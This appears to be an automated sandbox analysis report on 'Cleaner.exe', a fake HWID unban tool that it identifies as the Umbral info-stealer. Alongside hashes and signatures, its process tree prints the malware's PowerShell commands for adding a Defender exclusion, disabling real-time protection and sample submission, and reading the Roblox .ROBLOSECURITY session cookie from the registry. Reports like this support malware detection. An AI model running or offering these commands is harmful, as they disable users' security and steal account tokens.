Analysis

  • max time kernel
    150s
  • max time network
    157s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win10-20240221-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    27-03-2024 00:20

General

  • Target

    Unban Global HWID/Cleaner.exe

  • Size

    229KB

  • MD5

    00b50ac019d337a11d626cb5e48931a3

  • SHA1

    fab828f25f492a1a8f6e8f112f95daf5fb7ba209

  • SHA256

    bf5ed21104c2406217f2629ea5dac416172e4f7019817ae9fe81d5925c656936

  • SHA512

    8fab8f9fe41049a725df6bf275cf2f8e121c048f20f1608534d7118770ce096242481af1f38fb0ede9e34c8808e45bee80dfa06424a604544c10688e31610000

  • SSDEEP

    6144:lloZMCrIkd8g+EtXHkv/iD4p5NZf9rI8j667NokRg9/b8e1myi:noZZL+EP8pnZf9rI8j667NokRss

Score
10/10

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Unban Global HWID\Cleaner.exe
    "C:\Users\Admin\AppData\Local\Temp\Unban Global HWID\Cleaner.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2772
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Unban Global HWID\Cleaner.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:964
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3908
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3448
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      PID:1728
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      PID:4408
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:936
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • Detects videocard installed
      PID:3160
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:3868
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1360
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff83c949758,0x7ff83c949768,0x7ff83c949778
      2⤵
      PID:1996
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:2
      2⤵
      PID:1392
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1836 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:8
      2⤵
      PID:456
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2072 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:8
      2⤵
      PID:380
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:1
      2⤵
      PID:700
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3232 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:1
      2⤵
      PID:2620
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4428 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:1
      2⤵
      PID:2144
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4796 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:8
      2⤵
      PID:3260
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4948 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:8
      2⤵
      PID:204
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=1528 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:1
      2⤵
      PID:1248
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3284 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:8
      2⤵
      PID:3508
  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
    1⤵
    PID:5044

Network

MITRE ATT&CK Enterprise v15

Downloads
